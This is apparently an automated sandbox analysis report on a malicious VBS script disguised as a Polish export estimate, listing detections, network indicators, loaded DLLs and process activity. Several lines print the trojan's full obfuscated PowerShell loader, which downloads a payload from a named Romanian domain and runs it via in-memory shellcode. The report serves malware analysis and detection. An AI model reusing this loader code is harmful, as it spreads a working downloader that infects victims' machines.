              Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lB_q
              Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D2A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://deseuri-romania.ro
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://deseuri-romania.ro/Bennington.jpbP
              Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://deseuri-romania.ro/Bennington.jpbXR0l
              Source: powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1484608451.000002D2D21BE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
              Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknown; HTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2

              System Summary

              Source: amsi64_7608.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: amsi32_7852.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe; COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud 
';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
              Source: Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6147
              Source: unknown | Process created: Commandline size = 6147
              Source: amsi64_7608.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7852.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@9/7@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Ghastily.Kri
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwyz3jwf.her.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs"
              Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'cracking.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7608
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7852
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud 
';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
              Source: C:\Windows\System32\PING.EXE | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\PING.EXE | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: stem.Core.pdbTE source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementer", "0")
              Source: Yara matchFile source: 00000006.00000002.2673783211.00000000097DB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2673637961.0000000008380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2659683449.000000000569C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Triclinium)$GLOBAl:pERVAsION = [SysTeM.TEXT.eNCODIng]::Ascii.GetSTRING($tragikErE)$GlOBAl:NeWFoUnDlNDErS=$PerVaSIOn.SubStRIng($GROOverhEAd,$QUADRicyCLeR)<#Royals Fjsene Guarantine #>
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Preracing $Vanetnkningernesescabrrestordrens $Forladerne155), (Stereodeck @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bechirp = [AppDomain]::CurrentDom
